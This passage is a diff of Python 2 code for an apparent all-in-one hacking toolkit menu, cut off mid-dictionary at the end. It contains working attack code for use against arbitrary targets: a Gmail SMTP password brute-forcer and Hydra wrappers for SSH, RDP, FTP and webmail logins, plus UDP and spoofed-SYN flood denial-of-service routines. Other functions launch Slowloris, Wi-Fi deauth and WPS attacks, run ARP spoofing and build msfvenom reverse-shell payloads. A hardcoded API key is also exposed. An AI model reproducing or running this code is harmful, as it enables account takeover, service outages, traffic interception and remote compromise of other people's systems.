+#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + print "\nExamples: py, php, exe\n" + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", 